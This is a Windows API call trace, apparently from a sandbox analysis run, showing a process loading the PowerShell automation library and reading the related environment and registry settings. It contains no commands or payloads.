	[0385.220] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0385.220] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.222] GetCurrentProcessId () returned 0x3b0
	[0385.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.225] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d6f8 | out: phkResult=0x14d6f8*=0x360) returned 0x0
	[0385.225] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d67c, lpData=0x0, lpcbData=0x14d678*=0x0 | out: lpType=0x14d67c*=0x1, lpData=0x0, lpcbData=0x14d678*=0x56) returned 0x0
	[0385.226] CoTaskMemAlloc (cb=0x5a) returned 0x1b703420
	[0385.226] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d64c, lpData=0x1b703420, lpcbData=0x14d648*=0x56 | out: lpType=0x14d64c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d648*=0x56) returned 0x0
	[0385.226] CoTaskMemFree (pv=0x1b703420) 
	[0385.226] RegCloseKey (hKey=0x360) returned 0x0
	[0385.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.228] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.228] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
